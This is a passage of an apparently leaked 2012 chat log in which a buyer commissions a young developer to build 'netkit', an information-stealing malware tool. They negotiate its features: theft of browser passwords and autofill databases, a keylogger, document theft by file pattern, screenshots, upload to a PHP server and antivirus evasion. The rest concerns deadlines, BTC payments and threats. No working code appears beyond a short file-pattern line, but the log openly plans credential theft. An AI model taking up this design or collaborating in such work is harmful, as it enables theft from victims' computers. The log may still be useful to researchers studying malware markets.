  1387. [12/9/2012 1:03:51 AM] ' Tweety HF;: what u mean
  1388. [12/9/2012 1:05:22 AM] Shelly Bongo: dropbox stealer
  1389. [12/9/2012 1:34:46 AM] Shelly Bongo: ??
  1390. [12/9/2012 1:35:46 AM] ' Tweety HF;: I'm trying to find the keys
  1391. [12/9/2012 1:35:47 AM] ' Tweety HF;: hold on
  1392. [12/9/2012 1:37:35 AM] Shelly Bongo: okay, i need to leave, please do everything you can to have it all ready by tomorrow.
  1393. [12/9/2012 1:40:22 AM] ' Tweety HF;: No problem.
  1394. [12/9/2012 1:40:27 AM] ' Tweety HF;: Dropbox stealer is not possible.
  1395. [12/9/2012 1:40:37 AM] ' Tweety HF;: It downloads it from the cloud, it does not save the credentials
  1396. [12/9/2012 9:02:19 AM] Shelly Bongo: any news?
  1397. [12/9/2012 5:47:15 PM] Shelly Bongo: ???
  1398. [12/9/2012 9:10:19 PM] ' Tweety HF;: Finished the file stealer, just need a few more tweaks
  1399. [12/9/2012 9:13:56 PM] Shelly Bongo: okay, ETA for the fully working exe?
  1400. [12/9/2012 9:14:08 PM] Shelly Bongo: s/exe/source/
  1401. [12/9/2012 9:14:28 PM] Shelly Bongo: i must have it until tuesday morning
  1402. [12/9/2012 9:14:35 PM] ' Tweety HF;: Of course no problem.
  1403. [12/9/2012 9:14:48 PM] Shelly Bongo: okay
  1404. [12/9/2012 9:15:05 PM] ' Tweety HF;: When will you be sending the final payment?
  1405. [12/9/2012 9:15:27 PM] Shelly Bongo: we agreed that after i get the source and see it's fully working
  1406. [12/9/2012 9:15:32 PM] Shelly Bongo: but i can do 2 batches
  1407. [12/9/2012 9:15:49 PM] Shelly Bongo: 175$ upon source delivery
  1408. [12/9/2012 9:16:02 PM] Shelly Bongo: and 175$ more after i finish testing
  1409. [12/9/2012 9:16:30 PM] Shelly Bongo: testing means - see that functionality is what we agreed on, see it's fud, see it's stable, etc.
  1410. [12/9/2012 9:17:46 PM] ' Tweety HF;: no problem.
  1411. [12/9/2012 11:12:52 PM] Shelly Bongo: what about the pass recovery - got all of them down aside thunderbird?
  1412. [12/9/2012 11:32:44 PM] Shelly Bongo: ?
  1413. [12/9/2012 11:59:15 PM] Shelly Bongo: listen, i am beginning to be stressed with time, other people are depending on this, i'd like it to be ready tomorrow evening, up to 20 hours from now - please accommodate
  1414. [12/10/2012 12:08:57 AM] ' Tweety HF;: Yeah that's no problem.
  1415. [12/10/2012 12:18:37 AM] Shelly Bongo: [Sunday, December 09, 2012 11:12 PM] Shelly Bongo:
  1416.  
  1417. <<< what about the pass recovery - got all of them down aside thunderbird?
  1418. [12/10/2012 12:20:07 AM] ' Tweety HF;: Yes, apart from the cloud drives.
  1419. [12/10/2012 12:20:16 AM] ' Tweety HF;: It's not possible to get them.
  1420. [12/10/2012 12:20:29 AM] ' Tweety HF;: They are not stored in the local area but on the cloud.
  1421. [12/10/2012 12:31:40 AM] Shelly Bongo: NONE of them?
  1422. [12/10/2012 12:32:18 AM] Shelly Bongo: not even google drive / skydrive?
  1423. [12/10/2012 12:32:28 AM] ' Tweety HF;: It's not possible. It's all stored in the cloud.
  1424. [12/10/2012 12:32:36 AM] ' Tweety HF;: The credentials don't get stored within the computer
  1425. [12/10/2012 12:32:44 AM] Shelly Bongo: outlook?
  1426. [12/10/2012 12:36:51 AM] Shelly Bongo: Browsers - Chrome, Firefox, Internet Explorer 7-8-9, Safari
  1427. IM - Skype, MSN/Live, Google Talk, Yahoo
  1428. Mail - Outlook, Thunderbird
  1429. Cloud Drives - DropBox, Google Drive, SkyDrive
  1430.  
  1431.  
  1432.  
  1433. For the browsers - please include not only user/password information but also "autofill" information, e.g. see Chrome's "Addresses" and "Credit Cards" autofill settings
  1434. [12/10/2012 12:37:04 AM] Shelly Bongo: Cloud Drives is not in, Thunderbird is not in.
  1435. [12/10/2012 12:37:06 AM] Shelly Bongo: all the rest is in?
  1436. [12/10/2012 12:39:52 AM] ' Tweety HF;: Yes all the rest is in
  1437. [12/10/2012 12:40:17 AM] Shelly Bongo: and the browsers get autofill info?
  1438. [12/10/2012 12:40:56 AM] ' Tweety HF;: im looking into it, I never tried stealing auto fill before
  1439. [12/10/2012 12:41:09 AM] Shelly Bongo: what about skype?
  1440. [12/10/2012 12:41:16 AM] Shelly Bongo: does it steal the user/pass?
  1441. [12/10/2012 12:42:51 AM] ' Tweety HF;: skype is impossible
  1442. [12/10/2012 12:43:57 AM] Shelly Bongo: i just asked you if all the rest besides cloud drives / tbird are in, you said yes
  1443. [12/10/2012 12:44:04 AM] Shelly Bongo: please provide accurate answers.
  1444. [12/10/2012 12:44:10 AM] Shelly Bongo: WHAT IS IN AND WHAT IS NOT IN.
  1445. [12/10/2012 12:44:14 AM] Shelly Bongo: i'm starting to lose patience
  1446. [12/10/2012 12:44:16 AM] ' Tweety HF;: I had to check if it's in or not
  1447. [12/10/2012 12:44:40 AM] Shelly Bongo: okay, i have other loggers that steal some file from skype
  1448. [12/10/2012 12:44:48 AM] Shelly Bongo: you sure it's impossible?
  1449. [12/10/2012 12:44:52 AM] ' Tweety HF;: Yes.
  1450. [12/10/2012 12:45:18 AM] Shelly Bongo: so, aside skype/tbird/cloud-drives, all is in, 100%
  1451. [12/10/2012 12:45:20 AM] Shelly Bongo: ?
  1452. [12/10/2012 12:45:28 AM] ' Tweety HF;: Yes.
  1453. [12/10/2012 12:45:42 AM] Shelly Bongo: and you are working on autofill
  1454. [12/10/2012 12:45:46 AM] Shelly Bongo: okay
  1455. [12/10/2012 12:45:53 AM] Shelly Bongo: file stealer is done you said, right?
  1456. [12/10/2012 12:47:14 AM] ' Tweety HF;: Yes
  1457. [12/10/2012 12:47:31 AM] Shelly Bongo: so what's left?
  1458. [12/10/2012 12:47:50 AM] ' Tweety HF;: Need to do the intervals
  1459. [12/10/2012 12:47:53 AM] ' Tweety HF;: and then testing
  1460. [12/10/2012 12:48:10 AM] Shelly Bongo: and the data encryption/submission and php side
  1461. [12/10/2012 12:48:23 AM] ' Tweety HF;: that will take me 15 mins to write up
  1462. [12/10/2012 12:48:30 AM] ' Tweety HF;: i wrote one but it was a bit weird
  1463. [12/10/2012 12:48:33 AM] ' Tweety HF;: so ill redo it
  1464. [12/10/2012 12:48:54 AM] Shelly Bongo: is there any chance you can finish by tomorrow morning?
  1465. [12/10/2012 12:49:07 AM] ' Tweety HF;: Yes.
  1466. [12/10/2012 12:50:48 AM] Shelly Bongo: ok.
  1467. [12/10/2012 12:55:08 AM] ' Tweety HF;: for auto fill, can i just take the whole database?
  1468. [12/10/2012 12:55:16 AM] ' Tweety HF;: the db has 8 tables
  1469. [12/10/2012 12:55:32 AM] ' Tweety HF;: you can browse it in sqlite databases
  1470. [12/10/2012 12:55:53 AM] Shelly Bongo: you mean the file itself?
  1471. [12/10/2012 12:55:56 AM] ' Tweety HF;: yes
  1472. [12/10/2012 12:56:11 AM] ' Tweety HF;: extracting it will be very difficult because it has more than 8 tables
  1473. [12/10/2012 12:56:12 AM] Shelly Bongo: that's for chrome?
  1474. [12/10/2012 12:56:16 AM] ' Tweety HF;: yeah
  1475. [12/10/2012 12:56:27 AM] ' Tweety HF;: its the same with all browsers though
  1476. [12/10/2012 12:59:13 AM] Shelly Bongo: then yes just attach the dbfile
  1477. [12/10/2012 11:12:01 AM] Shelly Bongo: hi, status?
  1478. [12/10/2012 3:56:04 PM] Shelly Bongo: ???
  1479. [12/10/2012 10:12:38 PM] Shelly Bongo: i'm still waiting for an update, you are late on delivery and not responsive, i am not paying 500$ for somebody who works like a 50$ indi-project from freelancer.com
  1480. [12/10/2012 10:12:48 PM] Shelly Bongo: show up and explain.
  1481. [12/11/2012 1:46:00 AM] ' Tweety HF;: Hi
  1482. [12/11/2012 1:46:44 AM] ' Tweety HF;: I recently died inside, I care little to less about money now. Since my depression is kicking in I guess I can code better. You may use me as your slave. I will carry on finishing the project..
  1483. [12/11/2012 1:50:18 AM] Shelly Bongo: please, put that emo shit aside and finish the product - if this goes well there will be more, and i'm sure this pays better than other projects you might be involved in
  1484. [12/11/2012 1:50:25 AM] Shelly Bongo: s/product/project.
  1485. [12/11/2012 1:50:56 AM] Shelly Bongo: it's a shame we have to come to this disappointing stage really, try to make the best of it.
  1486. [12/11/2012 1:51:50 AM] ' Tweety HF;: My girlfriend of 2 years just left me recently, I know you don't care but I just need someone to know.
  1487. [12/11/2012 1:51:59 AM] ' Tweety HF;: I am debugging and finalizing the product now..
  1488. [12/11/2012 1:52:32 AM] Shelly Bongo: dude, you're 18.
  1489. [12/11/2012 1:52:43 AM] Shelly Bongo: you'll have other girlfriends and this won't matter, get over it.
  1490. [12/11/2012 1:53:17 AM] ' Tweety HF;: I was never interested in girls, this girl came into my life, we made so many plans, so many things. It was torn away from me. Im used to it.
  1491. [12/11/2012 1:53:52 AM] Shelly Bongo: well i'm sorry to hear that, but i honestly think it won't matter to you in 6 months time when you're doing other things with other people.
  1492. [12/11/2012 1:54:54 AM] Shelly Bongo: now kindly get back to coding.
  1493. [12/11/2012 1:55:08 AM] ' Tweety HF;: Yes sir.
  1494. [12/11/2012 1:55:14 AM] ' Tweety HF;: You don't have to be kind.
  1495. [12/11/2012 1:57:04 AM] Shelly Bongo: i am several dozens of years older than you, kindness gets you far, i won't stop now just because you've been irresponsible - i'm trying to make the most of the situation, as should you.
  1496. [12/11/2012 1:58:34 AM] ' Tweety HF;: Yes sir.
  1497. [12/11/2012 4:11:53 AM] ' Tweety HF;: I don't know how this will sound to you, but can you give me till the end of this week? The anti-virus bypass settings need to be done again, the methods im using with netkit don't seem to be FUD because of how netkit works. I know I am asking for more time, in exchange we can dock $50 off? Let me know.
  1498. [12/11/2012 11:42:03 AM] Shelly Bongo: Hi.
  1499. [12/11/2012 11:43:52 AM] Shelly Bongo: what's the status?
  1500. [12/11/2012 11:47:34 AM] Shelly Bongo: i'd like to see the progress via TV
  1501. [12/12/2012 5:57:45 PM] ' Tweety HF;: Done
  1502. [12/12/2012 5:58:01 PM] ' Tweety HF;: Just reworking the stealers, most of them are outdated so im just fixing them up
  1503. [12/12/2012 5:59:59 PM] Shelly Bongo: i hope you realize, you're not getting $500.
  1504. [12/12/2012 6:00:19 PM] Shelly Bongo: you will have to bring the price down for these delays.
  1505. [12/12/2012 9:50:33 PM] Shelly Bongo: i am really not liking these delays, more so the obvious lies you've been telling me regarding "everything is ready, just touchups left", also making something fud should not take so long.
  1506.  
  1507. listen, i don't want this to go to the wrong direction as i'm sure you don't.  i suggest you tell me the truth of what is and is not ready, and perhaps i will prefer to get the product faster without some of the features i requested (e.g. some of the stealers) - just be honest and tell me what's the status.  what is left, what's giving you a hard time.
  1508. [12/12/2012 9:56:25 PM] ' Tweety HF;: Before you said it was fine for 1-2 day delays, so I thought it should be fine since I have a lot going on. And honestly, I'm not lying at all. The stealer functions are the problems here.
  1509.  
  1510. IE = Old and outdated, only the older versions work but people stopped bothering to make a stealer for it because it is rarely ever used. I'm no good at making SQLite wrappers so I can't really do this and I asked around, nobody has a clue on how to do it either. It's too outdated for it to be updated for the latest versions.
  1511.  
  1512. Google Talk = Stealer has not been made yet, I have been trying to replicate on to the best of my abilities, but again, it's something which is never really in demand. The Chrome Stealer can grab the Gmail used for Google Talk so nobody ever made a stealer. I been working on it for a few days but realized that, again, it uses a cloud storage like Dropbox.
  1513.  
  1514. Yahoo = Again, same with IE. It's too outdated to have a working one.
  1515. [12/12/2012 9:56:56 PM] ' Tweety HF;: Last few days I been working on these stealers trying to come up with a method but I guess it's not something people are interested in anymore.
  1516. [12/12/2012 9:58:50 PM] Shelly Bongo: tell me what IS ready, what can you provide tomorrow?
  1517. [12/12/2012 10:01:16 PM] ' Tweety HF;: Chrome/Firefox/Opera/Sys Info/Process List/MS Product Key/Keylogger/File Stealer
  1518. [12/12/2012 10:02:14 PM] Shelly Bongo: browsers with autofill?
  1519. [12/12/2012 10:02:48 PM] ' Tweety HF;: That won't be possible since you have over 8 tables within the database, so it steals the actual database itself
  1520. [12/12/2012 10:03:06 PM] Shelly Bongo: we agreed on stealing the db itself, why do you say 'that won't be possible'
  1521. [12/12/2012 10:03:08 PM] Shelly Bongo: the db will contain autofill
  1522. [12/12/2012 10:03:13 PM] Shelly Bongo: correct?
  1523. [12/12/2012 10:03:24 PM] ' Tweety HF;: Yes.
  1524. [12/12/2012 10:03:54 PM] Shelly Bongo: is that ready for tomorrow?
  1525. [12/12/2012 10:04:01 PM] ' Tweety HF;: Yes.
  1526. [12/12/2012 10:04:34 PM] Shelly Bongo: file stealer works according to the spec i wrote you?
  1527. [12/12/2012 10:04:57 PM] ' Tweety HF;: Yes
  1528. [12/12/2012 10:05:10 PM] ' Tweety HF;: Doc/Docx/Xls
  1529. [12/12/2012 10:05:31 PM] ' Tweety HF;: Recent/My documents/Desktop
  1530. [12/12/2012 10:05:34 PM] Shelly Bongo: no, i told you that it needs to support pattern lists, and I can choose whatever i want in the source (e.g. *.txt too)
  1531. [12/12/2012 10:05:40 PM] Shelly Bongo: does it support pattern lists?
  1532. [12/12/2012 10:05:43 PM] ' Tweety HF;: Yes
  1533. [12/12/2012 10:05:45 PM] Shelly Bongo: okay
  1534. [12/12/2012 10:05:51 PM] ' Tweety HF;: Dim X As [String]() = {"*.doc", "*.docx", "*.xls"}
  1535. [12/12/2012 10:05:56 PM] Shelly Bongo: okay
  1536. [12/12/2012 10:06:18 PM] Shelly Bongo: so suppose we handicap the deliverables list to what is ready "for tomorrow"
  1537. [12/12/2012 10:06:40 PM] Shelly Bongo: is the PHP side ready?
  1538. [12/12/2012 10:06:56 PM] ' Tweety HF;: PHP is written up, just need to confirm something
  1539. [12/12/2012 10:06:59 PM] Shelly Bongo: did you test that all the discussed modules work and deliver content to the php?
  1540. [12/12/2012 10:07:12 PM] ' Tweety HF;: For each infected machine, do you want it to create a new root folder on the server?
  1541. [12/12/2012 10:07:59 PM] Shelly Bongo: regarding the folder, yes, according to PCName + Winkey
  1542. [12/12/2012 10:08:09 PM] ' Tweety HF;: winkey?
  1543. [12/12/2012 10:08:10 PM] Shelly Bongo: or you know what - nevermind
  1544. [12/12/2012 10:08:20 PM] Shelly Bongo: same folder
  1545. [12/12/2012 10:08:23 PM] Shelly Bongo: don't create a new one
  1546. [12/12/2012 10:08:58 PM] ' Tweety HF;: Alright, do you want a password for the zipped folders?
  1547. [12/12/2012 10:09:10 PM] Shelly Bongo: what folders? same folder
  1548. [12/12/2012 10:09:41 PM] Shelly Bongo: e.g. /var/www/archive/logs/
  1549. [12/12/2012 10:10:02 PM] Shelly Bongo: and files should be stored as "[COMPUTERNAME]-[IP]-files/keys/screenshots-[TIMESTAMP]"
  1550. [12/12/2012 10:10:06 PM] Shelly Bongo: btw, screenshots ready too?
  1551. [12/12/2012 10:10:09 PM] ' Tweety HF;: Yes
  1552. [12/12/2012 10:10:17 PM] Shelly Bongo: okay
  1553. [12/12/2012 10:10:52 PM] Shelly Bongo: so for this version of netkit with overly delayed and reduced features, i'm willing to pay no more than 400$.
  1554. [12/12/2012 10:10:59 PM] Shelly Bongo: provided that you deliver TOMORROW.
  1555. [12/12/2012 10:11:04 PM] Shelly Bongo: not 1 day after, but tomorrow
  1556. [12/12/2012 10:11:45 PM] Shelly Bongo: i had things depending on this job of yours and you failed me.
  1557. [12/12/2012 10:12:27 PM] Shelly Bongo: it'll need to be delivered AFTER the php part is done, after you verified all modules work and that AVs don't catch this
  1558. [12/12/2012 10:12:39 PM] Shelly Bongo: tell me if we have ourselves a deal or not.
  1559. [12/12/2012 10:17:33 PM] ' Tweety HF;: Did you not get my message tomorrow? I asked if I can have till the end of this week to get it finished completely and in return you could deduct $50 off the final payment.
  1560. [12/12/2012 10:17:48 PM] ' Tweety HF;: I don't understand why you're deducting me and still want it ready by tomorrow.
  1561. [12/12/2012 10:18:05 PM] Shelly Bongo: we agreed on spec X, and delivery date Y (sunday)
  1562. [12/12/2012 10:18:24 PM] Shelly Bongo: you took over half of the stealers and say "it's impossible", so you deducted X
  1563. [12/12/2012 10:18:42 PM] Shelly Bongo: and you are late on Y (delivery date), and want to be late even further.
  1564. [12/12/2012 10:18:55 PM] Shelly Bongo: and you expect price to be the same? are you okay?
  1565. [12/12/2012 10:19:17 PM] ' Tweety HF;: Hence why I asked to give me till the end of the week.
  1566. [12/12/2012 10:19:27 PM] ' Tweety HF;: And as far as I was aware:
  1567. [12/12/2012 10:19:28 PM] ' Tweety HF;: [Sunday, December 09, 2012 12:00 AM] Shelly Bongo:
  1568.  
  1569. <<< if there's a 1-2 day delay on the deadline - it's okay, just let me know what's up.
  1570. [12/12/2012 10:19:36 PM] Shelly Bongo: yes, but 1-2 days are over
  1571. [12/12/2012 10:19:39 PM] Shelly Bongo: and it's still not ready
  1572. [12/12/2012 10:19:48 PM] Shelly Bongo: hence, you missed the date.
  1573. [12/12/2012 10:20:09 PM] Shelly Bongo: it's wednesday now, you were supposed to deliver yesterday at max (2 day late after sunday)
  1574. [12/12/2012 10:20:26 PM] Shelly Bongo: regardless to that, you deducted the stealers to half.
  1575. [12/12/2012 10:20:39 PM] Shelly Bongo: how will waiting until end of the week help? you still won't provide these stealers
  1576. [12/12/2012 10:21:04 PM] Shelly Bongo: my requested features list will still not be fulfilled.
  1577. [12/12/2012 10:21:08 PM] ' Tweety HF;: I was researching and attempting to write up modules over the last few days for the stealers.
  1578. [12/12/2012 10:21:25 PM] Shelly Bongo: that's an explanation to WHY you missed the mark, you still missed it.
  1579. [12/12/2012 10:21:26 PM] ' Tweety HF;: = Late delivery
  1580. [12/12/2012 10:21:50 PM | Edited 10:22:09 PM] Shelly Bongo: dude, you're a service provider, i don't care about WHY things are delayed, you need to do w/e you can to deliver on time, it's your responsibility.
  1581. [12/12/2012 10:23:37 PM] ' Tweety HF;: You're asking for difficult work, you said it will be fine for 1-2 days delay. I asked before if I can have till the end of the week with a $50 deduction as well.
  1582. [12/12/2012 10:24:28 PM] Shelly Bongo: listen, there's really nothing to argue about.  if you deliver less features, or deliver later than what we agreed on (tuesday, yesterday was the final delivery date agreed on) - price will be deducted.
  1583. [12/12/2012 10:24:47 PM] ' Tweety HF;: Google Talk is stored in the cloud, it's not possible but you have the keylogger. Yahoo and IE is possible but the table rows have changed and since they are outdated applications not many people will ever work on them. I am willing to work on them though and currently writing up a method.
  1584. [12/12/2012 10:26:51 PM] ' Tweety HF;: Also, would you want a downloader module? I think it will be wise to include that in as well.
  1585. [12/12/2012 10:30:05 PM] Shelly Bongo: i need you to deliver something working ASAP.  i need it yesterday, but since that's not possible, i need it tomorrow.
  1586. [12/12/2012 10:30:12 PM] Shelly Bongo: no need for downloader modules.
  1587. [12/12/2012 10:31:00 PM] ' Tweety HF;: Alright
  1588. [12/12/2012 10:31:04 PM] Shelly Bongo: deliver what you have tomorrow, working, and i'll pay 400 - after that's delivered - you can work on *completing* the missing stealers, and i'll pay you an extra 50.
  1589. [12/12/2012 10:31:25 PM] Shelly Bongo: of course the paid $150 will be deducted from the 400.
  1590. [12/12/2012 10:31:40 PM] ' Tweety HF;: No problem.
  1591. [12/12/2012 10:32:44 PM] Shelly Bongo: do not disappoint me again, i will not tolerate this shit much longer.
  1592. [12/12/2012 10:33:27 PM] Shelly Bongo: i'm really surprised, you gave such a good impression from the get go
  1593. [12/12/2012 10:34:04 PM] ' Tweety HF;: Not much I can do when I try to recreate outdated work for a couple of days.
  1594. [12/12/2012 10:34:31 PM] ' Tweety HF;: Do you want the filestealer to steal the target of each shortcut?
  1595. [12/12/2012 10:34:47 PM] Shelly Bongo: no, work according to spec
  1596. [12/12/2012 10:53:09 PM] Shelly Bongo: what time tomorrow shall i expect it?
  1597. [12/12/2012 10:53:31 PM] Shelly Bongo: can you also deliver it in c# tomorrow, or only afterwards (as part of the 50$ package)
  1598. [12/12/2012 10:59:52 PM] ' Tweety HF;: C# conversion takes a while since I need to manage hosting process as well as unsafe code
  1599. [12/12/2012 11:00:01 PM] ' Tweety HF;: And sometime around the evening.
  1600. [12/12/2012 11:02:11 PM] ' Tweety HF;: going out for dinner now, will be on in a few hours
  1601. [12/12/2012 11:02:12 PM] ' Tweety HF;: bye
  1602. [12/12/2012 11:02:20 PM] Shelly Bongo: i will wait for the files tomorrow eve UK time.
  1603. [12/13/2012 5:23:36 PM] Shelly Bongo: news?
  1604. [12/13/2012 5:24:10 PM] ' Tweety HF;: Im in college
  1605. [12/13/2012 5:24:15 PM] ' Tweety HF;: I'll contact you when im home
  1606. [12/13/2012 5:24:32 PM] Shelly Bongo: oh, it's not evening yet in your TZ, okay.
  1607. [12/14/2012 2:14:42 AM] Shelly Bongo: hi
  1608. [12/14/2012 2:15:05 AM] Shelly Bongo: all ready?
  1609. [12/14/2012 7:35:44 PM] Shelly Bongo: ????
  1610. [12/14/2012 7:36:22 PM] ' Tweety HF;: Yeah it's ready.
  1611. [12/14/2012 7:36:35 PM] Shelly Bongo: okay, please send
  1612. [12/14/2012 7:36:40 PM] ' Tweety HF;: Hold on
  1613. [12/14/2012 7:36:44 PM] ' Tweety HF;: have you got a server?
  1614. [12/14/2012 7:36:55 PM] Shelly Bongo: yes
  1615. [12/14/2012 7:37:11 PM] ' Tweety HF;: Ok
  1616. [12/14/2012 7:37:40 PM] ' Tweety HF;: So screenshot + Keylogger + Sysinfo + Files all have different intervals?
  1617. [12/14/2012 7:38:50 PM] Shelly Bongo: yes
  1618. [12/14/2012 7:39:22 PM] ' Tweety HF;: Alright one moment
  1619. [12/14/2012 7:42:15 PM] Shelly Bongo: i have to go
  1620. [12/14/2012 7:42:22 PM] Shelly Bongo: you are late, again
  1621. [12/14/2012 7:42:29 PM] Shelly Bongo: i will return online in 24 hours
  1622. [12/14/2012 7:42:33 PM] Shelly Bongo: have it ready or we cancel this
  1623. [12/14/2012 7:42:37 PM] ' Tweety HF;: Alright.
  1624. [12/14/2012 7:42:57 PM] Shelly Bongo: and you'll either return my money or i'll ensure your unfair conduct is known
  1625. [12/14/2012 7:43:06 PM] ' Tweety HF;: Mhm.
  1626. [12/14/2012 7:43:26 PM] Shelly Bongo: please don't fuck with me, have it ready.
  1627. [12/14/2012 7:43:27 PM] Shelly Bongo: goodbye.
  1628. [12/14/2012 7:44:04 PM] ' Tweety HF;: Bye
  1629. [12/15/2012 12:09:35 PM] Shelly Bongo: hi, how's the progress?
  1630. [12/15/2012 8:30:44 PM] Shelly Bongo: ?
  1631. [12/16/2012 5:49:52 PM | Edited 5:50:04 PM] Shelly Bongo: seriously? you want me to complain about you publicly all over your precious forums? and Meph too who vouched for you? not only do you not deliver but you also disappear??
  1632. [12/16/2012 6:36:50 PM] ' Tweety HF;: I'm online.
  1633. [12/16/2012 6:43:13 PM] ' Tweety HF;: http://elementscanner.net//image.php?ID=0762c3c7f5a2f3331576cabc399ed2d6
  1634. [12/16/2012 6:43:25 PM] ' Tweety HF;: Will you be using a crypter or do I need to FUD it for you?
  1635. [12/16/2012 7:49:37 PM] Shelly Bongo: i'll be using a crypter
  1636. [12/16/2012 7:50:09 PM] Shelly Bongo: what is taking you so much time?
  1637. [12/16/2012 7:53:43 PM] ' Tweety HF;: I been done for a while, the day before I waited till evening but you didn't show up so I needed to go.
  1638. [12/16/2012 7:53:48 PM] ' Tweety HF;: I wait till evening yesterday too
  1639. [12/16/2012 7:54:12 PM] Shelly Bongo: that's BS - i was here for over 24 hours now
  1640. [12/16/2012 7:54:16 PM] Shelly Bongo: you weren't around
  1641. [12/16/2012 7:54:19 PM] Shelly Bongo: i sent you several messages
  1642. [12/16/2012 7:54:31 PM] Shelly Bongo: anyway
  1643. [12/16/2012 7:54:51 PM] Shelly Bongo: what's the status, is everything we agreed on ready?
  1644. [12/16/2012 7:54:54 PM] ' Tweety HF;: Yes
  1645. [12/16/2012 7:54:54 PM] ' Tweety HF;: Give me your host name
  1646. [12/16/2012 7:55:05 PM] Shelly Bongo: i won't be doing that
  1647. [12/16/2012 7:55:10 PM] Shelly Bongo: we agreed on what next
  1648. [12/16/2012 7:55:12 PM] Shelly Bongo: you supply source
  1649. [12/16/2012 7:55:15 PM] Shelly Bongo: i transfer BTC
  1650. [12/16/2012 7:55:22 PM] Shelly Bongo: once i test the source and see it's up to spec
  1651. [12/16/2012 7:55:37 PM] ' Tweety HF;: We can test it over teamviewer that's no problem
  1652. [12/16/2012 7:56:23 PM] Shelly Bongo: listen, with your disappearance and delivery fuckups - there's no way in hell that i'm paying you before receiving the source.
  1653. [12/16/2012 7:56:40 PM] Shelly Bongo: i gave you $150 usd advance payment, that's more than enough to show you i'm serious about this.
  1654. [12/16/2012 7:56:51 PM] Shelly Bongo: it's been your turn ever since
  1655. [12/16/2012 7:56:57 PM] Shelly Bongo: and i'm still waiting for you to deliver.
  1656. [12/16/2012 7:57:08 PM] ' Tweety HF;: There's more of a chance for you to run away because of the delivery delays.
  1657. [12/16/2012 7:57:18 PM] ' Tweety HF;: If you understand what I mean
  1658. [12/16/2012 7:57:27 PM] Shelly Bongo: decide how you want to proceed
  1659. [12/16/2012 7:58:03 PM] Shelly Bongo: either you pay me back 150$ and keep netkit to yourself
  1660. [12/16/2012 7:58:42 PM] Shelly Bongo: or send it over and get the rest of the money (i'm willing to pay $350, meaning $200 more - no more, because of your delays)
  1661. [12/16/2012 8:00:49 PM] ' Tweety HF;: There's more chance of you running away without paying me due to the delays over the chance of me not handing it over.
  1662. [12/16/2012 8:00:58 PM] ' Tweety HF;: I can send you a bin of it? That works.
  1663. [12/16/2012 8:01:07 PM] ' Tweety HF;: Everybody's happy.
  1664. [12/16/2012 8:01:12 PM] Shelly Bongo: i don't play statistics, we had an agreement, so far i kept my end of the bargain, waiting for your next move.
  1665. [12/16/2012 8:01:28 PM] ' Tweety HF;: Yeah sure, I'll send you a bin for you to test it.
  1666. [12/16/2012 8:01:31 PM] Shelly Bongo: i honestly don't trust that you'll send me a source
  1667. [12/16/2012 8:01:37 PM] Shelly Bongo: so that's not an option
  1668. [12/16/2012 8:02:29 PM] ' Tweety HF;: Dude, I don't need the source. What am I going to do with it?
  1669. [12/16/2012 8:02:31 PM] ' Tweety HF;: It's no use to me
  1670. [12/16/2012 8:05:47 PM] Shelly Bongo: you can sell it like your friend meph
  1671. [12/16/2012 8:06:02 PM] ' Tweety HF;: I don't need to sell it.
  1672. [12/16/2012 8:06:23 PM] ' Tweety HF;: Netkit is only worth to the person that is wanting me to code it
  1673. [12/16/2012 8:07:36 PM] Shelly Bongo: i don't buy that - we had an agreement, i intend to keep my end in it, if you don't intend to keep yours, we're done.
  1674. [12/16/2012 8:08:03 PM] Shelly Bongo: and by 'done' i mean you immediately return my $150 or i post every detail about our communication in the frauders section on HF.
  1675. [12/16/2012 8:09:08 PM] ' Tweety HF;: I don't understand why I can't send you the bin? That makes no sense. You want to test it out so the bin is required, not the source. By asking for the source before payment is something of that a scammer usually says.
  1676. [12/16/2012 8:09:32 PM] Shelly Bongo: do scammers usually pay $150 up front? no
  1677. [12/16/2012 8:10:28 PM] Shelly Bongo: i won't run any bin files, i don't know what's in it - i will review the source code, see it's clean, compile it, run it in VM, test that it works
  1678. [12/16/2012 8:10:33 PM] ' Tweety HF;: Using psychological engineering, you may have paid up front, take the source and not pay the rest meaning you pay a quarter of the price only. It's a smart move lol.
  1679. [12/16/2012 8:10:45 PM] Shelly Bongo: if it does - and keyboard, screenshots, files and sysinfo work - i pay you the remaining $200
  1680. [12/16/2012 8:10:56 PM] Shelly Bongo: if it doesn't, i'll report the bugs and ask you to fix them
  1681. [12/16/2012 8:10:59 PM] Shelly Bongo: before payment
  1682. [12/16/2012 8:11:17 PM] Shelly Bongo: that's been our agreement from day 1, and it's not going to change just because you suddenly got afraid.
  1683. [12/16/2012 8:11:28 PM] ' Tweety HF;: I don't understand what's wrong with watching me test it out over TV?
  1684. [12/16/2012 8:11:47 PM] Shelly Bongo: hmm, you know what
  1685. [12/16/2012 8:11:49 PM] Shelly Bongo: we can do that
  1686. [12/16/2012 8:11:53 PM] ' Tweety HF;: Alright.
  1687. [12/16/2012 8:12:04 PM] ' Tweety HF;: I need to make a quick host, hold on.
  1688. [12/16/2012 8:12:09 PM] Shelly Bongo: but it'll be a VM with Win7, ok?
  1689. [12/16/2012 8:12:12 PM] ' Tweety HF;: Yeah
  1690. [12/16/2012 8:12:22 PM] ' Tweety HF;: It's a modded version of Win7
  1691. [12/16/2012 8:13:08 PM] Shelly Bongo: modded how?
  1692. [12/16/2012 8:13:27 PM] ' Tweety HF;: Theme
  1693. [12/16/2012 8:14:07 PM] Shelly Bongo: that's fine
  1694. [12/16/2012 8:14:17 PM] Shelly Bongo: please uninstall .net from it
  1695. [12/16/2012 8:14:27 PM] Shelly Bongo: so it'll be as if it's a fresh installed win7
  1696. [12/16/2012 8:14:54 PM] ' Tweety HF;: It's fresh I installed it yesterday
  1697. [12/16/2012 8:15:04 PM] Shelly Bongo: okay
  1698. [12/16/2012 8:15:06 PM] Shelly Bongo: but i want to check
  1699. [12/16/2012 8:15:10 PM] Shelly Bongo: in add/remove programs
  1700. [12/16/2012 8:15:15 PM] Shelly Bongo: that no .net 4 is installed
  1701. [12/16/2012 8:15:16 PM] Shelly Bongo: ok?
  1702. [12/16/2012 8:15:20 PM] ' Tweety HF;: yeah sure
  1703. [12/16/2012 8:18:42 PM] Shelly Bongo: how do i know that you won't spread it the day after i pay you?
  1704. [12/16/2012 8:18:47 PM] Shelly Bongo: e.g. and all AVs will detect it
  1705. [12/16/2012 8:18:53 PM] Shelly Bongo: OR... if you start selling it on HF..
  1706. [12/16/2012 8:19:44 PM] ' Tweety HF;: Because nobody will be interested in it, it's suitable only to you.
  1707. [12/16/2012 8:19:48 PM] ' Tweety HF;: And I will delete it after
